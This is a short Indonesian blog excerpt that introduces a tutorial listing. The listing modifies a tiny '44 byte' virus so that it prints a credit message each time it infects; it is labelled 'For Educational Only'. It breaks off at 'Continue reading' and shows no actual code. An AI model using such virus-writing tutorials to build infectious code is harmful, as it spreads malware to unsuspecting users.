end start

Listing. 4.4. Rutin Cetak String

Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte
Dengan tambahan rutin untuk menampilkan string :

Modification of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –

setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu
Continue reading...
 

Categories

free counters

Follower

Binus Hacker Copyright © 2010 Binus Hacker is Designed by Binus Hacker Crew Sponsored by Binus Hacker

Techie Blogger